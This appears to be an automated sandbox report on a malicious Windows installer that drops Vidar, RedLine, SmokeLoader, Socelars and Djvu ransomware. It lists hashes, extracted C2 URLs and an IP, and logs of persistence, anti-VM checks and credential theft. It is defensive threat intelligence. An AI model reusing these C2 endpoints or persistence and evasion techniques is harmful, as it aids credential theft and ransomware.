Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Analysis
-
max time kernel
409s -
max time network
1812s -
platform
windows7_x64 -
resource
win7-jp -
submitted
12-09-2021 07:11
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
3.5MB
-
MD5
1b5154bc65145adba0a58e964265d5f2
-
SHA1
5a96fd55be61222b3e6438712979dc2a18a50b8c
-
SHA256
c48cd55efee57f0b7ff4547a0a20ebfbdf4188d059512b10a29879bf30c4fc19
-
SHA512
9465da97b0986fef660e3f7725b4d4c034bef677acbe36382d95a8052c54634f004162aa3f105156e503af1b26632e47e44234ef9825b388260a6bcd310a5026
Malware Config
Extracted
vidar
40.5
706
https://gheorghip.tumblr.com/
-
profile_id
706
Extracted
redline
pab123
45.14.49.169:22411
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
vidar
40.5
328
https://gheorghip.tumblr.com/
-
profile_id
328
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2564 1772 rundll32.exe 18 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3012 1772 rundll32.exe 18 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral1/memory/748-197-0x0000000004700000-0x000000000471F000-memory.dmp family_redline behavioral1/memory/748-198-0x0000000004B00000-0x0000000004B1E000-memory.dmp family_redline behavioral1/memory/2920-319-0x000000000041C5EE-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 3 IoCs
resource yara_rule behavioral1/files/0x0001000000012f3f-107.dat family_socelars behavioral1/files/0x0001000000012f3f-161.dat family_socelars behavioral1/files/0x0001000000012f3f-157.dat family_socelars -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 4 IoCs
resource yara_rule behavioral1/memory/1788-185-0x0000000001A50000-0x0000000001B21000-memory.dmp family_vidar behavioral1/memory/1788-188-0x0000000000400000-0x00000000017F2000-memory.dmp family_vidar behavioral1/memory/1788-375-0x0000000003320000-0x00000000033F1000-memory.dmp family_vidar behavioral1/memory/1788-376-0x0000000000400000-0x00000000017F2000-memory.dmp family_vidar -
resource yara_rule behavioral1/files/0x0001000000012f32-69.dat aspack_v212_v242 behavioral1/files/0x0001000000012f32-70.dat aspack_v212_v242 behavioral1/files/0x0002000000012f2c-71.dat aspack_v212_v242 behavioral1/files/0x0001000000012f34-76.dat aspack_v212_v242 behavioral1/files/0x0001000000012f34-75.dat aspack_v212_v242 behavioral1/files/0x0002000000012f2c-72.dat aspack_v212_v242 -
Blocklisted process makes network request 1 IoCs
flow pid Process 69 3012 rundll32.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts 46807GHF____.exe -
Executes dropped EXE 60 IoCs
pid Process 1960 setup_installer.exe 1608 setup_install.exe 1788 Sun05ac1b0207d3ff3b8.exe 1880 Sun05640630a6aa.exe 1172 Sun05532f7abc.exe 2032 Sun059375dac544fc4a.exe 748 Sun052bbd8bebd9.exe 1428 Sun050462125c7d35.exe 876 Sun05d60bc3b96248e5.exe 648 Sun054fe19a12cb3.exe 268 Sun05899db881f67fb29.exe 1112 Sun05fa3b4d2ae56e.exe 2136 Sun054fe19a12cb3.tmp 2708 46807GHF____.exe 2828 LzmwAqmV.exe 2860 5301299.exe 2956 7193947.exe 2984 Chrome 5.exe 3012 PublicDwlBrowser1100.exe 840 2.exe 2040 setup.exe 1812 udptest.exe 2248 WinHoster.exe 2256 5502626.exe 2484 949770.exe 2628 6753134.exe 2616 2598751.exe 2672 setup_2.exe 1588 3002.exe 2032 7848138.exe 2820 setup_2.tmp 820 jhuuee.exe 1620 BearVpn 3.exe 3052 2489767.exe 1832 setup_2.exe 2156 4604564.exe 328 setup_2.tmp 2920 6753134.exe 2068 C3KHKEn~m73GVLA.exE 1976 ultramediaburner.exe 2120 Davojakuny.exe 2576 Paedawucuju.exe 2744 ultramediaburner.tmp 2356 UltraMediaBurner.exe 2784 services64.exe 2712 postback.exe 1788 V4lKmhz9b.exe 3112 sihost64.exe 3244 installer.exe 3184 2FE6.exe 3492 iexplore.exe 3244 installer.exe 2372 anyname.exe 3720 gcleaner.exe 3140 6411.exe 3592 AD42.exe 3668 AD42.exe 2140 238B.exe 2376 schtasks.exe 2848 AD42.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2598751.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2598751.exe -
Loads dropped DLL 64 IoCs
pid Process 1996 setup_x86_x64_install.exe 1960 setup_installer.exe 1960 setup_installer.exe 1960 setup_installer.exe 1960 setup_installer.exe 1960 setup_installer.exe 1960 setup_installer.exe 1608 setup_install.exe 1608 setup_install.exe 1608 setup_install.exe 1608 setup_install.exe 1608 setup_install.exe 1608 setup_install.exe 1608 setup_install.exe 1608 setup_install.exe 1640 cmd.exe 1640 cmd.exe 1680 cmd.exe 1680 cmd.exe 1292 cmd.exe 820 cmd.exe 1908 cmd.exe 1908 cmd.exe 1880 Sun05640630a6aa.exe 1880 Sun05640630a6aa.exe 1172 Sun05532f7abc.exe 1172 Sun05532f7abc.exe 1788 Sun05ac1b0207d3ff3b8.exe 1788 Sun05ac1b0207d3ff3b8.exe 748 Sun052bbd8bebd9.exe 748 Sun052bbd8bebd9.exe 1164 cmd.exe 968 cmd.exe 1612 cmd.exe 1400 cmd.exe 1852 cmd.exe 1852 cmd.exe 876 Sun05d60bc3b96248e5.exe 876 Sun05d60bc3b96248e5.exe 648 Sun054fe19a12cb3.exe 648 Sun054fe19a12cb3.exe 1112 Sun05fa3b4d2ae56e.exe 1112 Sun05fa3b4d2ae56e.exe 648 Sun054fe19a12cb3.exe 2136 Sun054fe19a12cb3.tmp 2136 Sun054fe19a12cb3.tmp 2136 Sun054fe19a12cb3.tmp 2608 rundll32.exe 2608 rundll32.exe 2608 rundll32.exe 2608 rundll32.exe 2136 Sun054fe19a12cb3.tmp 1788 Sun05ac1b0207d3ff3b8.exe 1788 Sun05ac1b0207d3ff3b8.exe 1788 Sun05ac1b0207d3ff3b8.exe 1788 Sun05ac1b0207d3ff3b8.exe 2828 LzmwAqmV.exe 2828 LzmwAqmV.exe 2828 LzmwAqmV.exe 2828 LzmwAqmV.exe 2956 7193947.exe 2956 7193947.exe 2828 LzmwAqmV.exe 2828 LzmwAqmV.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 3992 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 7193947.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\Fetizhecagy.exe\"" 46807GHF____.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\cf0efb36-035b-46df-ad48-214876738f7b\\AD42.exe\" --AutoStart" AD42.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2598751.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\O: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\W: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 16 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 284 api.2ip.ua 2184 api.2ip.ua 2738 ip-api.com 2820 ip-api.com 282 api.2ip.ua 1994 ip-api.com 2179 api.2ip.ua 326 api.2ip.ua 1996 ip-api.com 2561 ip-api.com 2483 ip-api.com 2702 ip-api.com 13 ip-api.com 1131 ip-api.com 1640 whatismyip.akamai.com 2229 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2616 2598751.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 2628 set thread context of 2920 2628 6753134.exe 102 PID 2712 set thread context of 1856 2712 postback.exe 127 PID 2784 set thread context of 3688 2784 services64.exe 146 PID 3592 set thread context of 3668 3592 AD42.exe 178 PID 2376 set thread context of 2848 2376 schtasks.exe 186 -
Drops file in Program Files directory 12 IoCs
description ioc Process File created C:\Program Files\Windows Defender\JKHCIHQGJV\ultramediaburner.exe 46807GHF____.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-39MR2.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-4RLVL.tmp setup_2.tmp File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File created C:\Program Files\Windows Defender\JKHCIHQGJV\ultramediaburner.exe.config 46807GHF____.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\Fetizhecagy.exe 46807GHF____.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\Fetizhecagy.exe.config 46807GHF____.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-M8IE7.tmp ultramediaburner.tmp File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI70CF.tmp msiexec.exe File created C:\Windows\Installer\f7a5aec.msi msiexec.exe File opened for modification C:\Windows\Installer\f7a5aec.msi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
pid pid_target Process procid_target 1204 840 WerFault.exe 69 2664 2628 WerFault.exe 80 2380 2860 WerFault.exe 65 3020 2256 WerFault.exe 74 2504 2156 WerFault.exe 94 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun05532f7abc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun05532f7abc.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun05532f7abc.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 V4lKmhz9b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString V4lKmhz9b.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2400 schtasks.exe 3144 schtasks.exe 2376 schtasks.exe 1176 schtasks.exe -
Delays execution with timeout.exe 4 IoCs
pid Process 2360 timeout.exe 3520 timeout.exe 3856 timeout.exe 3384 timeout.exe -
Kills process with taskkill 10 IoCs
pid Process 2772 taskkill.exe 2624 taskkill.exe 3436 taskkill.exe 1732 taskkill.exe 2316 taskkill.exe 2796 taskkill.exe 3816 taskkill.exe 2760 taskkill.exe 664 taskkill.exe 1732 taskkill.exe -
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{87483A80-1398-11EC-BBAD-FE4AFC315D7E} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "957" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "9" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\ = "9" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\ = "47" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "957" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 501a82baa5a7d701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "28" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\ = "89" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "868" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\ = "74" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "74" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "9" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\ = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "89" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "121" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "338195646" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "28" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "868" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\ = "957" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d327e8bcedb2d4b986abc323ea826ca00000000020000000000106600000001000020000000df4581c67910a70a80f8b2e8c1c8a09bb577e9f92d31c430c1173cda9b168667000000000e80000000020000200000007cd2716ebecb899c399c166d7b00d85c0ed7153ac83363de12a8986009edd7cd200000007cff5e80ad676c1ededc25eadd174287c46081f7f8f1c06e02154617600eed75400000007ea972581ccaa5d0dd73189f3d5ece22a6a4fc1b15a602f2507462f9dec5b3c298e4146a976ca6c7739b910da225eb9b196b73321f60f57d16524bedec555cfa iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d327e8bcedb2d4b986abc323ea826ca0000000002000000000010660000000100002000000076c8e1a0000a06e1f4bb5e7757e0f0588612d8230d09f1596a8ae18d968be588000000000e80000000020000200000003973c2784bbf9bae2a2d644199e43d736721c77437946f7b91be6efa7260014c90000000739da9515ce0e5ea7fadfa28cbc5cf32a5f889daf2aeb53a63fd0a28e7c8182da339e5a364c35bdd16ead68d96094e70bee3024a32082cb3ab675bba183210e40081154185a317fd8e56a488b3ec82e37a4f03fc531246dd38c015cdbb9ac0757b7e0e0e13302c6733f69702e3822b7509fb81b7395c45f50c8b18f852c819785ebb7f9891552ed382483d59a15041cf40000000e8957587213b00076c929c454ff2619aa925e4357bb1e47645af1987ca9ef4a74d1336e736f34f6cf59697ff34efb5febe13f60619a606e1e7a6d84280cbd412 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "47" IEXPLORE.EXE -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0